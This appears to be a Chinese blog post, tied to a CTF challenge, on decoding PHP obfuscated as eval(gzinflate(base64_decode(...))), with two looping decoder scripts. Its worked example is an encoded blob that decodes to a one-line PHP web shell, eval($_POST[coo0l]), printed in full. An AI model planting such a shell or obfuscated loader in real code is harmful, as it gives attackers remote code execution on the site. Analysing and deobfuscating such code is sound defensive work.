关于eval gzinflate base64_decode的解密方法

源代码

<?php
eval(gzinflate(base64_decode(‘加密部分 ‘)));
?>

只需要把eval 改成echo即可输出明文内容

相关题目：https://cgctf.nuptsast.com/challenges#Web 的PHP encode

如果改为echo还是类似的内容可以使用以下的的解密方法：

解法1：

<?php

//已经加密的文件内容
$a = “eval(gzinflate(base64_decode(‘这里面放BASE64代码’)));”;
function decodephp($a)
{
$max_level = 300; //最大层数
for ($i = 0; $i < $max_level; $i++) {
ob_start();
eval(str_replace(‘eval’, ‘echo’, $a));
$a = ob_get_clean();
if (strpos($a, ‘eval(gzinflate(base64_decode’) === false) {
return $a;
}
}
}

echo decodephp($a);
?>

解法2：

<?php

$a = file_get_contents(“加密.php”); //含有eval语句的文本文件
//将有eval(gzinflate(base64_decode的加密文件只留eval(gzinflate(base64_decode(‘…’);”语句
//其他诸如”<?”等信息都去掉并保存文件为”加密.php”
while (strstr($a, “eval”)) {
ob_start();
eval(str_replace(“eval”, “echo”, $a));
$a = ob_get_contents();
}
echo $a;
?>

例子：

下面这个例子用echo也无法解密，但是可以用上面的2个方法
<?php
echo(gzinflate(base64_decode(‘DdS3EqNWAEDRfn/Eu0NBTmOPd8hCpEcWNB7CAyRA5Pj13u42p72///3n99iMP37APet+1vf7W3XZCn/m2QIZ6r8SFkMJf/4ll96jnWxdUGSvipB2wnTz8xBSECiRrp8C1DlCud/NqVu1lcEKLGq1V+jN3hxKkTvHZ6uSVWv0zUV0hZ1f9a9xJPwBpYbrQc0Xw5YJAUra6iKodOSy5tPe7Gt7fRLuqRnu0IO7HmRrVD1fxFeK2f2O1fv5wqik6ci0XuSjF4Swsih9w1QiGhdHod7s1r9EhnivBnLsmn4xa4lbDA6WrAPtdbdEHOZswZhkFO3s0/HloCA9DY8P4+bJkXLIdchUxFHPTxKZWt+WnWmGLXhiQHN3qm0Q6VnoO3vY/ckHsWOIGlV8XMV+UaZEcKBPsZgj+S7kKISh2ZQiNnVK4zlHRIt6B3jDl1Q4+e1dy5ZqmXb73JPXtWn+17i/hvBQFlEdrFopoTeovgwy5WxlIZVZNEnYBYkG6g9OQrBgxMC7yVs6jwjMpoeCIIio/dFLm3cHTaA141F+CvRT0swD9PPbqdBl3Hyo7kclQMFmTIumUi3tyVEMWI6S7DE3Ycn148vqQGTmZJx9OU5gjQg5gjN2jZ1QDgALD40TJJQQGj9S4JXm6GlyYW3wDViCyCEpeB4wiJWX8za3/WYMePG2i03eKDCHrtUlY1qsOEje1ZNI0Vys8DHUy5iAW/yVvs+mESrbTA9BLQtsI52NNSsmEQ5J8FHadb0gFXiQsWTHoOfByWnW9zaJz/uTND4Mts76xBqIVB48F1l7rvf50Dg+XBai/DzNS40ITBXbsJxjsOjqWKN9/piDp6nOSUu+0qwz8KM4ibR1MLL6TpK4PKjNd+0IWZE/8R3myU3TJ+X3/ZiO1ewlH/p8PBoGh6C+71RfrG7Ir7kSri3QDmWGZ+v3rIjfsIqVqCfPGwZPxV6+CoRE60eY1DhE57EGl77cJtPd7aKbY44XEjjTsqZGpaYLy4VEWORuuCAcYz0TTtc8Ui7UpgaqpU7NSSi4r7wnLLHlmXA8tbSA+9CZvhz77ZWq7A37rvoMFytqNlzcb6NQnEu/wzMusfJBn68TzeTtcpGEdujKeOnrFngtW8RO7VTMIm5evd80RnEQ0+O78O+JYEMd5a9stxWXWxWJaKV6qiTPYXxFV/rdUhFGQmb+jbmHML4fHF/tLILuYKYRNEHr6q9fv379/eP3nxn9Dw==’)));
?>

输出的结果为

<?php eval($_POST[coo0l]);?>

声明：
1.本网站资源来源于网络收集，如有侵权，请联系站长进行删除处理。请发送邮件至：chensi2024@foxmail.com，我们将第一时间处理！
2.资源所需价格并非资源售卖价格，是收集、整理、编辑详情以及本站运营的适当补贴，并且本站不提供任何免费技术支持本站资源售价只是赞助，收取费用仅维持本站的日常运营所需。
3.所有资源仅限于参考和学习，版权归原作者所有，更多请阅读网站声明。
4.如下载链接失效，请在当前页留言或私信管理员，24小时必处理结束！
5.本站提供的源码、模板、插件等等其他资源，都不包含技术服务请大家谅解。
6.本站提供的资源仅限用于学习交流和研究目的。不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负，我们不保证内容的长久可用性，通过使用本站内容随之而来的风险以及产生法律纠纷与本站无关，您必须在下载后的24个小时之内，从您的电脑/手机中彻底删除。